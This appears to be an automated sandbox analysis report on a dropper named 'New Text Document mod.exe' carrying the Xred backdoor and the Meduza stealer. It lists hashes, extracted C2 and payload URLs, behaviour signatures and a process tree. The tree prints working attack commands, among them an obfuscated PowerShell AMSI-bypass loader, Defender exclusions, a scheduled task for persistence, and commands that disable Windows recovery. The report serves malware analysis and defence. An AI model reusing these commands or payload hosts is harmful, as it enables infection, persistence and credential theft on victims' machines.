Overview

overview

10

Static

static

10

New Text D...od.exe

windows7-x64

10

New Text D...od.exe

windows10-2004-x64

10

New Text D...od.exe

windows10-ltsc 2021-x64

10

New Text D...od.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-01-2025 13:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New Text Document mod.exe

  • Size

    761KB

  • MD5

    c6040234ee8eaedbe618632818c3b1b3

  • SHA1

    68115f8c3394c782aa6ba663ac78695d2b80bf75

  • SHA256

    bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

  • SHA512

    a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

  • SSDEEP

    12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I

Score
10/10
meduzaxredbackdoorcollectiondefense_evasiondiscoveryexecutionexploitpersistencespywarestealer

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

    stealermeduza
  • Meduza Stealer payload 4 IoCs
  • Meduza family
    meduza
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xred

    Xred is backdoor written in Delphi.

    backdoorxred
  • Xred family
    xred
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Possible privilege escalation attempt 3 IoCs
    exploit
  • Executes dropped EXE 13 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
    discovery
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
    collection
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:628
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:432
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1c0acc71-7f36-49fa-abe0-b4de8731ecdb}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4800
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:680
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:984
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:764
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:948
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1108
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1120
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1184
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jwYcFWNIPUAB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kgWuStgdFQvDzP,[Parameter(Position=1)][Type]$YLNDWvAVdM)$EWTvRMOIyFU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+'m'+'o'+'ry'+'M'+'od'+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'te'+[Char](84)+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+'P'+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+'A'+''+'n'+'siC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+'oC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$EWTvRMOIyFU.DefineConstructor(''+'R'+'TS'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e,'+[Char](72)+''+'i'+'d'+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$kgWuStgdFQvDzP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$EWTvRMOIyFU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+'N'+'e'+'w'+[Char](83)+''+'l'+''+'o'+''+'t'+''+','+'V'+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$YLNDWvAVdM,$kgWuStgdFQvDzP).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $EWTvRMOIyFU.CreateType();}$ipormlUbicEWZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+'cr'+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+'.'+'Win'+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+'d'+'s'+'');$ICyEURmnMeEgZQ=$ipormlUbicEWZ.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+'c'+[Char](44)+'S'+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KSqeQmckdiTwPWEGosn=jwYcFWNIPUAB @([String])([IntPtr]);$ToFGqnTWTSmYEjGExtvpVc=jwYcFWNIPUAB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IiwPYseNnQR=$ipormlUbicEWZ.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$UDbhVdtgYdSgXT=$ICyEURmnMeEgZQ.Invoke($Null,@([Object]$IiwPYseNnQR,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+'r'+'a'+[Char](114)+'y'+[Char](65)+'')));$qLOIbLEtUcqvvvMjH=$ICyEURmnMeEgZQ.Invoke($Null,@([Object]$IiwPYseNnQR,[Object]('Vir'+[Char](116)+''+[Char](117)+'al'+'P'+''+'r'+'o'+'t'+'ec'+[Char](116)+'')));$DwcsONQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UDbhVdtgYdSgXT,$KSqeQmckdiTwPWEGosn).Invoke('a'+'m'+''+[Char](115)+''+'i'+''+'.'+'dl'+[Char](108)+'');$PLbKNAIKLKPksEmQJ=$ICyEURmnMeEgZQ.Invoke($Null,@([Object]$DwcsONQ,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+'f'+[Char](102)+''+'e'+''+'r'+'')));$adnPQrypoW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qLOIbLEtUcqvvvMjH,$ToFGqnTWTSmYEjGExtvpVc).Invoke($PLbKNAIKLKPksEmQJ,[uint32]8,4,[ref]$adnPQrypoW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PLbKNAIKLKPksEmQJ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qLOIbLEtUcqvvvMjH,$ToFGqnTWTSmYEjGExtvpVc).Invoke($PLbKNAIKLKPksEmQJ,[uint32]8,0x20,[ref]$adnPQrypoW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'L'+''+[Char](77)+''+[Char](88)+''+'s'+''+[Char](116)+'a'+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3504
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1212
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1304
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1312
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                            1⤵
                              PID:1324
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1408
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2892
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                  • Indicator Removal: Clear Windows Event Logs
                                  PID:1564
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                  1⤵
                                    PID:1604
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1684
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1700
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1708
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1820
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1852
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1956
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1620
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1788
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1984
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2056
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2148
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2260
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2312
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2444
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2452
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                    PID:2512
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2524
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2608
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2616
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2632
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2648
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:2988
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3100
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                    PID:3244
                                                                                    • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
                                                                                      2⤵
                                                                                      • Adds Run key to start application
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3664
                                                                                      • C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1444
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          4⤵
                                                                                            PID:4828
                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\sk.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\sk.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:640
                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\sk.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\sk.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:784
                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\gem1.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\gem1.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1572
                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\gem1.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\gem1.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1680
                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\gem1.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\gem1.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4836
                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\gem1.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\gem1.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Accesses Microsoft Outlook profiles
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • outlook_office_path
                                                                                              • outlook_win_path
                                                                                              PID:3096
                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\gem1.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\gem1.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3252
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 836
                                                                                              5⤵
                                                                                              • Program crash
                                                                                              PID:2280
                                                                                        • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                          "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2096
                                                                                          • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1600
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:3848
                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\gem2.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\gem2.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Maps connected drives based on registry
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Drops file in Program Files directory
                                                                                                • Enumerates system info in registry
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3468
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4492
                                                                                                • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                                  SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                  6⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1832
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe
                                                                                                  6⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:4572
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg -change standby-timeout-ac 0
                                                                                                    7⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4044
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg -change monitor-timeout-ac 0
                                                                                                    7⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2380
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
                                                                                                    7⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1904
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg /setactive SCHEME_CURRENT
                                                                                                    7⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1976
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    cmd.exe /C reagentc /disable
                                                                                                    7⤵
                                                                                                      PID:4484
                                                                                                      • C:\Windows\system32\ReAgentc.exe
                                                                                                        reagentc /disable
                                                                                                        8⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:4656
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
                                                                                                      7⤵
                                                                                                        PID:2800
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
                                                                                                          8⤵
                                                                                                            PID:3208
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
                                                                                                          7⤵
                                                                                                            PID:1376
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
                                                                                                              8⤵
                                                                                                                PID:3456
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              cmd.exe /C takeown /f C:\Windows\System32\reagentc.exe
                                                                                                              7⤵
                                                                                                                PID:3972
                                                                                                                • C:\Windows\system32\takeown.exe
                                                                                                                  takeown /f C:\Windows\System32\reagentc.exe
                                                                                                                  8⤵
                                                                                                                  • Possible privilege escalation attempt
                                                                                                                  • Modifies file permissions
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3480
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:F
                                                                                                                7⤵
                                                                                                                  PID:1980
                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                    icacls C:\Windows\System32\reagentc.exe /grant administrators:F
                                                                                                                    8⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:4400
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
                                                                                                                  7⤵
                                                                                                                    PID:2728
                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                      icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
                                                                                                                      8⤵
                                                                                                                      • Possible privilege escalation attempt
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:4620
                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                    wmic diskdrive get serialnumber
                                                                                                                    7⤵
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1140
                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                    wmic diskdrive get serialnumber
                                                                                                                    7⤵
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1832
                                                                                                                  • C:\Windows\System32\curl.exe
                                                                                                                    curl -s https://api.ipify.org
                                                                                                                    7⤵
                                                                                                                      PID:4444
                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                      wmic diskdrive get serialnumber
                                                                                                                      7⤵
                                                                                                                        PID:4588
                                                                                                                      • C:\Windows\System32\curl.exe
                                                                                                                        curl -s http://ipinfo.io/country
                                                                                                                        7⤵
                                                                                                                          PID:3372
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            8⤵
                                                                                                                              PID:4664
                                                                                                                          • C:\Windows\System32\svchost.exe
